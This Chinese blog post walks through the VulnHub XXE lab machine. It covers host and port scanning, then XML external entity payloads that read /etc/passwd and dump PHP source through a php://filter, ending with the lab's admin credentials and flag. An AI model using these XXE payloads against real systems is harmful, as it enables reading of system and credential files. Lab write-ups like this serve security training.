xee靶机渗透~XEE注入

已于 2024-07-31 22:58:04 修改
阅读量326 收藏 1
点赞数 1
分类专栏: 其它靶场 文章标签: 网络 网络安全 xml php
于 2024-07-31 22:53:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_67832625/article/details/140805335
版权

在这里插入图片描述
XML外部实体注入(XML Extenrnal Entity Injection),简称XXE漏洞。引发XXE漏洞的主要原因是XML解析依赖库libxml默认开启了对外部实体的引用,导致服务端在解析用户提交的XML信息时未作处理直接进行解析,导致加载恶意的外部文件和代码,造成任意文件读取,命令执行(利用条件苛刻)、内网扫描等危害。

准备工作

Target IP:192.168.66.134
Attack IP:192.168.66.84
靶机地址:https://download.vulnhub.com/xxe/XXE.zip
靶机目标:SAFCSP{xxe_is_so_easy}

主机发现

# 扫描该网段下的所有主机
arp-scan -l

image-20240730191022516

# 发现目标
192.168.66.134

端口扫描

# 对目标的端口进行扫描
nmap -A -sV -p- 192.168.66.134

image-20240730191411985

# 发现http端口开放着,然后对其进行访问

image-20240730191517985

目录扫描

# 对目标机进行扫描
dirsearch -u http://192.168.66.134

image-20240730191803777

image-20240730191839673

# 发现robort.txt 对其进行访问

image-20240730192003917

# 分别对其目录进行访问

image-20240730192114955

image-20240730192157050

渗透测试

# 抓包进行爆破

image-20240730192436483

# 抓包发现有xml,然后我们就可以用xee来测试注入
<?xml version = "1.0"?>
<!DOCTYPE a [<!ENTITY b "xxe">]>
<c>&b;</c>

image-20240730192805493

# 漏洞利用
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [<!ENTITY b SYSTEM "file:///etc/passwd">]>
<root><name>&b;</name><password>asdadsad</password></root>

image-20240730193034985

# 尝试对shadow进行爆破,发现无果

image-20240730193243703

# 尝试xee.php
<!DOCTYPE a [<!ENTITY b SYSTEM "php://filter/read=convert.base64-encode/resource=xxe.php">]>

image-20240730193615634

# 然后对其base64位编码
<?php
libxml_disable_entity_loader (false);
$xmlfile = file_get_contents('php://input');
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$info = simplexml_import_dom($dom);
$name = $info->name;
$password = $info->password;

echo "Sorry, this $name not available!";
?>

无果!!!!

# /robots.txt 里面有一个admin.php的文件 我们试一下

image-20240730194034165

# 解码
<?php
session_start();
?>
<html lang = "en">
<head>
<title>admin</title>
<link href = "css/bootstrap.min.css" rel = "stylesheet">
<style>
body {
padding-top: 40px;
padding-bottom: 40px;
background-color: #ADABAB;
}
.form-signin {
max-width: 330px;
padding: 15px;
margin: 0 auto;
color: #017572;
}
.form-signin .form-signin-heading,
.form-signin .checkbox {
margin-bottom: 10px;
}
.form-signin .checkbox {
font-weight: normal;
}
.form-signin .form-control {
position: relative;
height: auto;
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
padding: 10px;
font-size: 16px;
}
.form-signin .form-control:focus {
z-index: 2;
}
.form-signin input[type="email"] {
margin-bottom: -1px;
border-bottom-right-radius: 0;
border-bottom-left-radius: 0;
border-color:#017572;
}
.form-signin input[type="password"] {
margin-bottom: 10px;
border-top-left-radius: 0;
border-top-right-radius: 0;
border-color:#017572;
}
h2{
text-align: center;
color: #017572;
}
</style>
</head>
<body>
<h2>Enter Username and Password</h2>
<div class = "container form-signin">
<?php
$msg = '';
if (isset($_POST['login']) && !empty($_POST['username'])
&& !empty($_POST['password'])) {
if ($_POST['username'] == 'administhebest' &&
md5($_POST['password']) ==
'e6e061838856bf47e1de730719fb2609') {
$_SESSION['valid'] = true;
$_SESSION['timeout'] = time();
$_SESSION['username'] = 'administhebest';
echo "You have entered valid use name and password
";
$flag = "Here is the <a style='color:FF0000;'
href='/flagmeout.php'>Flag</a>";
echo $flag;
}else {
$msg = 'Maybe Later';
}
}
?>
</div> <!-- W00t/W00t -->
<div class = "container">
<form class = "form-signin" role = "form"
action = "<?php echo htmlspecialchars($_SERVER['PHP_SELF']);
?>" method = "post">
<h4 class = "form-signin-heading"><?php echo $msg; ?></h4>
<input type = "text" class = "form-control"
name = "username"
required autofocus></br>
<input type = "password" class = "form-control"
name = "password" required>
<button class = "btn btn-lg btn-primary btn-block" type =
"submit"
name = "login">Login</button>
</form>
Click here to clean <a href = "adminlog.php" tite =
"Logout">Session.
</div>
</body>
</html>

# 发现了好东西

image-20240730194315984

# 将password编码后得administhebest  admin@123

# 发现访问flagmeout.php
直接访问它

image-20240730194701374

# 发现是空白页 我们看一下源代码

image-20240730194729939

发现flag,起飞!!!

好小子,离成功又进一步!!!

蚂蚱.top
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XML外部实体注入总结(XXE靶机复现)
qq_61702710的博客
07-16 844
6,访问靶机的/xxe路径发现存在登录,随便输入账号密码发现页面存在回显,利用burpsuite抓包查看,通过抓包发现是XML数据的提交,利用外部实体注入读取用户的账户文件,确定存在XXE漏洞。解码出来发现一串类似于无字符Webshell构造的PHP内容,复制到PHP上跑一跑,应该需要PHP版本比较低,PHP7以上就跑不出来flag,这里用的是PHP5.6。9,又出来一个新站点/etc/.flag.php,一样代入上面poc,读出新的内容。依次将所知道的站点带入:admin.php,xxe.php
XXE漏洞靶场复现
weixin_63124284的博客
10-19 899
XXE也叫XML(可扩展标记语言)外部实体注入,然后我们这里拆开来解释!!! 外部实体:通过调用外部实体声明部分对XML数据进行修改、插入恶意代码。 注入:在XML数据传输过程中,数据被恶意修改,导致服务器最终执行了修改后的恶意代码。 因此XXE指的是XML数据在传输过程中,利用外部实体声明部分的“SYSTEM”关键字导致XML解析器可以从本地文件或者远程的URL中读取受保护的数据。
CTFSHOW-web373-378
qq_52579508的博客
08-01 413
在vps上创建一个test.dtd文件,用于反弹shell,内容如下。要绕过 http 就要进行编码绕过 编码为 utf-16。和上题的代码差别不大 ,但是没有输出了,无回显数据。要使用远程服务器 加载 dtd文件。VPS收到flag的base64。以及可以使用这个payload。上面的payload 不行了。这里他不能带有 http了。查看flag的payload。输入的内容不能带那个。
XXE&XML之利用检测绕过
weixin_52221158的博客
08-27 1421
XML被设计为传输和存储数据,XML文档结构包括XML声明,DTD文档类型定义(可选),文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。
vulnhub XXE靶场复现
weixin_44914783的博客
09-19 1478
信息收集 (1)如图,为环境搭建好之后的状态,暂时什么都未知 (2)使用nmap工具对网段进行扫描,获取到xxe平台的IP和端口开放情况,可以判断出该平台IP为192.168.159.223 (3)进行验证,成功 (4)使用kali工具dirsearch对网站进行目录扫描,发现敏感文件robots.txt (5)访问192.168.159.223/robots.txt,再次发现两个敏感文件,依次访问 ...
95.网络安全渗透测试—[常规漏洞挖掘与利用篇11]—[XXE(XML外部实体)注入漏洞与测试]
qwsn
02-03 2668
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、XXE注入 1、相关概念 (1)XXE定义: (2)漏洞版本: (3)相关概念: 2、漏洞示例:`有回显的XXE注入` (1)靶机环境:本地的phpstudy-`php5.4.5` (2)漏洞页面源码:`xxe01.php` (3)查看libxml版本:`2.7.8<2.9` (4)任意读取文件:`file://伪协议` (5)利用伪协议读取文件:`php的filter伪协议` (5)扫描端口:`单线程` (6)执行
Pikachu靶场练习总结
weixin_47387913的博客
03-05 2920
Pikachu靶场练习总结 前辈们好!作为一个进入安全行业的初学者,靶场练习必不可少,我将我对某些靶场练习的总结写在这里,错误之处请多多指正。 靶场:pikachu 关卡:暴力破解 基于表单的暴力破解: 先看提示: 用户名和密码我们都是不清楚的,可建立密码库利用burp中的Intruder功能进行暴力破解,先通过Proxy截取报文,发送到Intruder中。 因为用户名和密码都是不清楚的,那么我们要添加username和password2个爆破选...
hackthebox-chatterbox(考点:achat缓冲区溢出利用/windows账号利用/端口转发)
冬萍子癸水
04-07 642
nmap搞起 TMD扫了几次都没扫出来 噢提示1000个常用都被过滤了,那我扫更高的1000-10000 ok了,两个稀奇古怪端口,鬼TM知道是什么 好吧,searchsploit achat 就用36025.py buffer flow吧 作者很贴心,把坏字符和生成的方法都写出来了.我们做的就是替换自己ip/端口的shellcode,以及修改目标IP和cmd指令 普通shell: msfve...
OSCP-课外1(http万能密码、hydra密码暴力破解http、代码审计、Win缓存区溢出)
墨痕诉清风的博客
02-23 1768
通过将access.exe和funcs_access.dll文件发布到http://10.0.0.115/student_attendance/assets/uploads/access/目录,使用到Windows虚拟机下载到本地。到http://10.0.0.115/student_attendance/assets/uploads/看到了我们上传的shell文件。可以通过浏览器访问该目录http://10.0.0.115/student_attendance/assets/uploads/
红队专题-Meterpreter
aming小老弟
09-06 649
Metasploit是一款开源的安全漏洞检测 渗透测试 工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。
XXE靶机渗透
zzgslh的博客
04-12 861
靶机描述 XXE靶机,目标获取flag。 (下载链接:https://download.vulnhub.com/xxe/XXE.zip)。 渗透测试过程 端口扫描 使用nmap扫描发现开放80,5355端口。 访问web服务 1.首先访问80端口,页面是Ubuntu的默认页面。 2.使用御剑扫描web目录,发现存在robots.txt目录。 3.访问robots.txt目录...
第39天-WEB 漏洞-XXE&XML 之利用检测绕过全解
MCTSOG的博客
03-31 1290
文章目录思维导图基础知识XMLXXEXML 与 HTML 的主要差异DTDDTD 实体XXE 漏洞修复与防御方案-php,java,python-过滤及禁用方案 1-禁用外部实体方案 2-过滤用户提交的 XML 数据涉及案例:pikachu 靶场 xml 数据传输测试-回显,玩法,协议,引入玩法-读文件玩法-内网探针或攻击内网应用(触发漏洞地址)玩法-RCE引入外部实体 dtd无回显-读取文件evil2.dtdxxe-lab 靶场登陆框 xml 数据传输测试-检测发现CTF-Vulnhub-XXE 安全真题
ctfshow--xxe
qq_51684648的博客
03-15 2628
ctfshow–xxe 有回显 <?php error_reporting(0); libxml_disable_entity_loader(false); //file_get_contents("php://input"),我么需要post我们的payload $xmlfile = file_get_contents('php://input'); if(isset($xmlfile)){ //DOMDocument,表示整个HTML或XML文档;作为文档树的根 $dom =
Blind XXE
Vicl1fe的博客
12-21 437
又到了惊心动魄的XXE学习下篇了!! Blind XXE 继 Normal XXE之后。又到了Blind XXE了。Blind XXE即无回显注入,废话不多说了。直接上代码 先来两个文件 3.php <?php libxml_disable_entity_loader (false); $xmlfile = file_get_contents('1.xml'); $...
UDP协议
hyldzbg的博客
09-04 874
把当前要计算校验和的数据,每个字节,都进行累加,把结果保存到这两个字节的变量(校验和)中,过程中溢出也没关系,如果中间某个数据,出现传输错误,第二次计算的校验和就会和第一次不同(CRC这个算法其实不是特别靠谱,比如如果前一个字节大小少1,后一个字节大小多1,那么最后得到的校验和任然相同,但是数据可能已经不同了)。描绘这个数据报的报文长度(包含报头),这里的长度是指该报文有多少个字节,因为只有16位比特位的大小,因为数据传输可能会出错,所以需要一定的方法知道所传输的数据是否正确传输。
网络第五章:多路转接
最新发布
qincjun的博客
09-05 577
2.HTTP1.1采用了长连接的方式来进行通信:建立连接,服务器响应完之后,不断开连接,活跃的用户对服务器发送请求,服务器都会正常响应;对不活跃的用户,不进行任何操作;events是分配好的epoll_event结构体数组.epoll将会把发生的事件赋值到events数组中 (events不可以是空指针,内核只负责把数据复制到这个events数组中,不会去帮助我们在用户态中分配内存).epoll通过这些值的设定,来监视fd的行为,如果fd做了这些行为,则会通过epoll_wait来反馈给上层,进行处理。
观测云核心技术解密:eBPF Tracing 实现原理
观测云的博客
09-03 950
通过 eBPF,开发者可以在不修改内核源码的情况下,对内核功能进行扩展和监控。eBPF Tracing 利用这一技术,对系统调用、内核函数等进行跟踪,从而实现对应用行为的深入洞察。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值